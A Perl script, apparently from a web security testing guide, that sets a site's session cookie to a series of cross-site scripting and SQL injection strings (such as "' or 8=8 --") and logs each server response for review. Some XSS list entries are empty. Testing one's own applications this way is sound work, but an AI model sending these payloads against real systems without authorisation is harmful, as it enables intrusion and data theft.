#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;

$myCookies = HTTP::Cookies->new();

$URL  = "http://www.example.com/login.jsp";
$UA   = LWP::UserAgent->new();
$UA->cookie_jar( $myCookies );

# We will create a bunch of malicious keys and values.
# Consider places like http://ha.ckers.org/xss.html for example
# Cross-site scripting (XSS) strings.
@XSSAttacks = ( '\';!--"=&{()})',
 				'',
				''
			  );
@SQLAttacks = ( '\' or 8=8 --',
				'" or 8=8 --',
				")",
 				);

# First fetch a web page that sends a cookie.
$req  = HTTP::Request->new( GET => $URL );
$resp = $UA->request($req);

# Make an index file that tells you what attacks did what:
open INDEXFILE, ">test-index.txt";
print INDEXFILE "num  Test String\n";

$testnum = 0;
foreach $attackString (@XSSAttacks, @SQLAttacks) {
	# open a unique output file where we store the result of this test
	open OUTFILE, ">test-$testnum.html" or
		die "can't create test-$testnum.html output file";

	# Our Malicious Cookie: Contains a known session ID.
	$version = 0;
	$key     = "session_id";
	$val     = "$attackString";
	$path    = "/";
	$domain  = ".example.com";
	$expires = "123412345";

	# Add the malicious cookie to our jar. Fields we don't care
	# about are undefined.
	$myCookies->set_cookie(
    	$version, $key,  $val,     $path, $domain, undef,
    	undef,    undef, $expires, undef, undef );

	# now fetch the file, using a malicious cookie
	$req = HTTP::Request->new( GET => $URL );
	$UA->prepare_request($req);
	$resp = $UA->request($req);

	printf( INDEXFILE "%2d: %s\n", $testnum, $attackString );
	print OUTFILE $resp->as_string();
	close OUTFILE;
	$testnum++;
}
close INDEXFILE;